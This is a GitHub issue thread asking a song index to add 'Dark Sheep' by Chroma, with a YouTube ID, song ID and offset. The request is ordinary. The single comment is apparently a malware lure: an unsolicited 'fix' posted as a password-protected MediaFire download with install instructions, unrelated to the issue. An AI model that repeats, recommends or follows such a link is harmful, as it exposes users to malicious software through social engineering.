### ISSUE TITLE
Add Dark Sheep by Chroma

### ISSUE THREAD

**Issue by MaddBob** [FlafyDev/auto-nong-indexes#3473]
### Song Name

Dark Sheep

### Artist Name

Chroma

### Source

Youtube

### Youtube Link

bYCbm469Zq0

### Song ID

1

### Start Offset [ms]

0.50

### Extra

Created from Auto Nong.
Created for level: 65642514

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
